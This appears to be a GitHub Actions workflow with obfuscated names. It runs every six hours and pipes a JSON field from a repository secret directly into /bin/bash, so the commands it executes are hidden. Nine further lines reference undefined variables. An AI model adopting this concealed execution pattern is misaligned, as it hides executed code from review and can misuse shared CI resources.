name: shayinluo2345

on:
  workflow_dispatch:
  schedule:
    - cron: '48 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shayinluo2345
        env:
          asom268: ${{ secrets.asom268 }}
        run: |
          echo $asom268 | jq -r .l9 | /bin/bash
          echo $f2 | jq -r .wopmw0923 | /bin/bash
          echo $qbg0 | jq -r .wbhw711 | /bin/bash
          echo $cu56796 | jq -r .g4096 | /bin/bash
          echo $mi2551 | jq -r .gt434 | /bin/bash
          echo $kzy9684 | jq -r .jq7852 | /bin/bash
          echo $xt243 | jq -r .yhuhz9 | /bin/bash
          echo $mzhy44515 | jq -r .jh51 | /bin/bash
          echo $ruuym139 | jq -r .zdc8135 | /bin/bash
          echo $jvr25 | jq -r .ltj58 | /bin/bash

